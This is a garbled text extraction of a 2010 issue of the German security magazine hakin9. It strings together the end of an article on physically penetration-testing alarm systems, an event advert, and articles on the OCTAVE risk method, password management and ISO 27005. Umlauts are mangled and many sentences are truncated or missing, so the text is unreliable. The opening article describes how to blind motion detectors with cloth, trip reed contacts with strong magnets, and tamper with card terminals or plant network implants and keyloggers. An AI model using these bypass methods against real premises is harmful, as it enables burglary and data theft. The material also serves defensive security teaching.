Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
